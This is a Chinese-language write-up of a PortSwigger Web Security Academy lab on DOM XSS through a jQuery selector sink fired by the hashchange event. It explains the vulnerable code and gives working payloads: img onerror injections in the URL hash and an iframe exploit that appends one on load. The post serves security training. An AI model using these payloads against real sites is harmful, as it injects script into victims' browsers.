【Portswigger : DOM XSS in jQuery selector sink using a hashchange event】

一句话解释这个漏洞:

攻击者把恶意代码放进URL的#后面,网站傻傻地把这段代码当成选择器的一部分执行,结果浏览器把这段"选择器"当成了HTML标签创建并执行了其中的JavaScript。

看看前端代码

$(window).on('hashchange', function(){
var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')');
if (post) post.get(0).scrollIntoView();
});
关键部分解释
  1. 事件监听$(window).on('hashchange', function(){...})

    • 监听 window 对象的 hashchange 事件,当浏览器地址栏中 # 后面的哈希值发生变化时(比如从 #标题1 变成 #标题2),就会执行这个回调函数。
  2. 哈希值处理

    • window.location.hash:获取地址栏的哈希值(包含 #,比如 #Java入门)。

    • 控制台输入window.location.hash

      • .slice(1):去掉开头的 #,得到纯文本(比如 Java入门)。
    • decodeURIComponent():解码 URI 编码的字符(比如处理 %20 这类空格编码),避免中文 / 特殊字符匹配失败。

  3. 元素查找

    • $('section.blog-list h2:contains(...)'):在 <section class="blog-list"> 标签下,查找所有包含指定文本的 <h2> 标签(也就是博客标题)。
    • 注意::contains 是 jQuery 选择器,匹配包含指定文本的元素,匹配是大小写敏感的。
  4. 滚动到视图

    • post.get(0):把 jQuery 对象转换成原生 DOM 元素(因为 scrollIntoView() 是原生 JS 方法)。
    • scrollIntoView():让找到的元素自动滚动到浏览器可视区域的顶部(默认行为)。
    • 原代码中 if (post) 其实不够严谨,因为即使没找到元素,post 也是一个空的 jQuery 对象(布尔值为 true),应该改成 if (post.length > 0)

    https://0abd00710449d45fca56979b007600ea.web-security-academy.net/# <img src="x" onerror=alert(777)>

提示要用print打印机

bash 复制代码
https://0abd00710449d45fca56979b007600ea.web-security-academy.net/#%20%3Cimg%20src=%22x%22%20onerror=print()%3E

使用exploit server

iframe嵌入攻击:

iframe标签用于加载嵌入外部内容。

bash 复制代码
<iframe src="https://0acb007a0425916d804c03c000830035.web-security-academy.net/#" onload="this.src += '<img src=# onerror=print()>'"></iframe>

store(存储)并执行viewexpliot


相关推荐
小陈工1 小时前
Python Web开发入门(十七):Vue.js与Python后端集成——让前后端真正“握手言和“
开发语言·前端·javascript·数据库·vue.js·人工智能·python
xiaotao1315 小时前
第九章:Vite API 参考手册
前端·vite·前端打包
午安~婉5 小时前
Electron桌面应用聊天(续)
前端·javascript·electron
彧翎Pro6 小时前
基于 RO1 noetic 配置 robosense Helios 32(速腾) & xsense mti 300
前端·jvm
小码哥_常6 小时前
解锁系统设置新姿势:Activity嵌入全解析
前端
之歆6 小时前
前端存储方案对比:Cookie-Session-LocalStorage-IndexedDB
前端
哟哟耶耶6 小时前
vue3-单文件组件css功能(:deep,:slotted,:global,useCssModule,v-bind)
前端·javascript·css
是罐装可乐7 小时前
深入理解“句柄(Handle)“:从浏览器安全到文件系统访问
前端·javascript·安全
华科易迅7 小时前
Vue如何集成封装Axios
前端·javascript·vue.js
康一夏7 小时前
Next.js 13变化有多大?
前端·react·nextjs